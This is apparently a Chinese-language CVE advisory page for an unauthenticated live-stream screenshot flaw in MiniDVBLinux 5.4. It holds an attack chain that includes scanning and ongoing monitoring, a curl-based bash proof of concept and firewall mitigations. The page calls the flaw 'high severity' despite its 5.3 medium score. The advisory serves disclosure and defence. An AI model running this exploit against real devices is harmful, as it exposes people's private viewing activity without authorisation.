CVE-2023-53773 CVSS 5.3 中危

CVE-2023-53773 MiniDVBLinux tv_action.sh未授权直播流截图获取漏洞

披露日期: 2025-12-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2023-53773

漏洞类型

未授权访问/信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

MiniDVBLinux 5.4

漏洞概述

CVE-2023-53773是MiniDVBLinux 5.4版本中的一个高危安全漏洞。该漏洞存在于tv_action.sh脚本中，攻击者可以通过Simple VDR协议无需任何认证即可生成和获取直播流的屏幕截图。漏洞允许远程攻击者向/tpl/tv_action.sh发送特制请求，系统将自动创建当前直播节目的截图并存储在/var/www/images/tv.jpg文件中。攻击者随后可以直接访问该图片文件，从而获取用户正在观看的直播节目信息。此漏洞属于OWASP Top 10中的A01-2021失效的访问控制类别，暴露了系统对敏感操作的访问控制机制不足。攻击者可能利用获取的信息了解用户的观看习惯、地理位置偏好等隐私信息，具有一定的情报收集价值。

技术细节

该漏洞的技术根源在于tv_action.sh脚本缺乏适当的身份验证机制。攻击者通过HTTP请求访问/tpl/tv_action.sh端点时，脚本直接执行TV截图功能而未验证请求者的身份。攻击过程涉及两个关键步骤：首先，攻击者向目标服务器的/tpl/tv_action.sh发送恶意请求，触发截图生成功能；然后，攻击者访问/var/www/images/tv.jpg获取生成的直播截图。脚本通过Simple VDR Protocol与底层TV服务交互，获取当前直播流的帧数据并将其保存为JPEG格式。整个过程无需任何会话令牌、Cookie或认证凭证。攻击者可利用此漏洞批量扫描目标系统，持续监控特定设备的观看内容。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别运行MiniDVBLinux 5.4的暴露在互联网上的设备，通常通过Shodan、Censys等搜索引擎进行扫描

STEP 2

步骤2: 漏洞探测

攻击者尝试访问/tpl/tv_action.sh端点，验证目标是否存在未授权访问漏洞

STEP 3

步骤3: 触发截图生成

通过HTTP GET请求访问tv_action.sh脚本，脚本将自动调用Simple VDR Protocol生成当前直播流的截图并保存到/var/www/images/tv.jpg

STEP 4

步骤4: 获取敏感信息

攻击者访问/var/www/images/tv.jpg获取截图文件，分析图片内容获取用户正在观看的直播节目信息

STEP 5

步骤5: 持续监控

攻击者可设置定时任务定期执行上述操作，监控目标设备的观看习惯和节目偏好

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2023-53773 PoC - MiniDVBLinux Unauthenticated Live Stream Screenshot Disclosure
# Target: MiniDVBLinux 5.4
# Endpoint: /tpl/tv_action.sh
# Output: /var/www/images/tv.jpg

TARGET_HOST="${1:-target.example.com}"
TARGET_PORT="${2:-80}"

# Step 1: Trigger screenshot generation via tv_action.sh
echo "[*] Triggering screenshot generation on ${TARGET_HOST}:${TARGET_PORT}"
curl -s -o /dev/null -w "%{http_code}" "http://${TARGET_HOST}:${TARGET_PORT}/tpl/tv_action.sh"

# Step 2: Retrieve the generated screenshot
echo -e "\n[*] Downloading screenshot from /var/www/images/tv.jpg"
curl -s -o tv_screenshot.jpg "http://${TARGET_HOST}:${TARGET_PORT}/var/www/images/tv.jpg"

if [ -f tv_screenshot.jpg ]; then
    echo "[+] Screenshot saved as tv_screenshot.jpg"
    file tv_screenshot.jpg
else
    echo "[-] Failed to retrieve screenshot"
fi

# Note: This PoC demonstrates the vulnerability without causing harm
# Use responsibly and only on systems you have permission to test

影响范围

MiniDVBLinux 5.4

防御指南

临时缓解措施

在防火墙层面阻止对/tpl/tv_action.sh和/var/www/images/目录的外部访问；如业务需要远程访问TV功能，应配置VPN隧道或强认证机制；定期监控访问日志，检测异常的截图请求行为；考虑使用网络分段技术将TV服务与公网隔离。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表